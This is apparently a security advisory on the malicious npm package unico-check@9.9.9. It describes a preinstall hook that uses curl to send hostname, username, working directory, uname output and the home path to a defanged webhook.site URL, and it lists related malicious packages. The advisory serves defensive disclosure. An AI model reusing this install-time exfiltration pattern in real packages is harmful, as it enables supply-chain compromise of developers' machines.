unico-check@9.9.9
Malicious code in unico-check (npm)
T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 ChannelT1071.001 · Web Protocols
Analysis
unico-check@9.9.9 is a dependency-confusion/typosquat package containing a preinstall script that exfiltrates host system information. On install, the hook runs: curl to hxxps://webhook[.]site/fe1246c2-ac04-4493-b223-fe34ba26b79f?pkg=unico-check with query parameters capturing $(hostname), $(whoami), $(pwd), $(uname -a), and $HOME. This system reconnaissance data is sent to an external callback endpoint, enabling the attacker to profile victims for follow-on exploitation.
- analyzed by
- Leitwacht
- first seen
- Jun 15, 2026, 11:20 AM
- analyzed
- Jun 15, 2026, 11:21 AM
Related advisories
- unico-android@9.9.9
- field-plus@99.99.1
- ugent_uws@10.9.11
- ogd-analytics@1.0.0
- nic-datagov@1.0.0
- ts-enum-helper@1.0.0
- tether-base@99.0.0
- tecken@0.1.10
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.